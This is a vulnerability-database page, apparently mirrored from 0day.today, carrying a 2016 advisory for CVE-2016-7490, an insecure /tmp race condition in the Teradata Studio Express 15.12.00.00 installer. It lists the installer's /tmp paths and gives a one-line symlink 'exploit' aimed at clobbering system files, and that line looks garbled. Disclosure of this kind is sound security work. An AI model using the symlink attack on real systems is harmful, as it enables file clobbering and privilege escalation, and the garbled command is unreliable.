Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Teradata Studio Express 15.12.00.00 Race Condition Vulnerability

🗓️ 19 Nov 2016 00:00:00Reported by Larry CashdollarType 
zdt
 zdt🔗 0day.today👁 47 Views

Teradata Studio Express v15.12.00.00 insecure /tmp race conditio

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2016-7490
10 Nov 201616:59
attackerkb
CNVD		Teradata Studio Express Elevation of Privilege Vulnerability
14 Nov 201600:00
cnvd
CVE		CVE-2016-7490
10 Nov 201616:00
cve
Cvelist		CVE-2016-7490
10 Nov 201616:00
cvelist
EUVD		EUVD-2016-8343
7 Oct 202500:30
euvd
NVD		CVE-2016-7490
10 Nov 201616:59
nvd
OSV		CVE-2016-7490
10 Nov 201616:59
osv
Packet Storm		Teradata Studio Express 15.12.00.00 Race Condition
19 Nov 201600:00
packetstorm
Prion		Code injection
10 Nov 201616:59
prion
Title: /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-03
Download Site: http://downloads.teradata.com/download/tools/teradata-studio-express
Vendor: Teradata
Vendor Notified: 2016-10-03
Vendor Contact: web form contact
Description: Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP). 
Vulnerability:
The installation script for TeradataStudioExpress.15.12.00.00 creates files in /tmp insecurely.  A malicious local user could create a symlink in /tmp and possibly clobber system files or perhaps elevate privileges.

$ grep -n "/tmp" studioexpressinstall 

33:ASKDIRFILE=/tmp/sqlajeaskdir
41:DEF_TRACEFILE=/tmp/studioexinstall.log
44:TMP=/tmp
72:SQLAJEINPUTS=/tmp/studioexinputs
90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out
103:SQLAJEINSTALL=/tmp/studioexpressinstall
136:   java -version > "/tmp/javaver" 2>&1
137:   verstring=`grep "java version" /tmp/javaver`
143:      jre64b=`grep "64-Bit" /tmp/javaver`
212:rm -f /tmp/javaver 
341:   tmptracefile=/tmp/studioexinstall.log.tmp    #Temporary trace file.
588:touch /tmp/checkstudioexinstall
603:rm -f /tmp/checkstudioexinstall
604:rm -f /tmp/studioexinstall_rpmcmd.out

CVE-ID: CVE-2016-7490
Export: JSON TEXT XML
Exploit Code:
  aC/ $ ln -s /tmp/javaver /etc/passed
Advisory: http://www.vapidlabs.com/advisory.php?v=174

#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Nov 2016 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.00041
teradata studio expressv15.12.00.00insecure/tmprace conditionvulnerabilityeclipsercplocal usersymlinkclobber system fileselevate privilegescve-2016-7490jsontextxmlexploit codeadvisory
47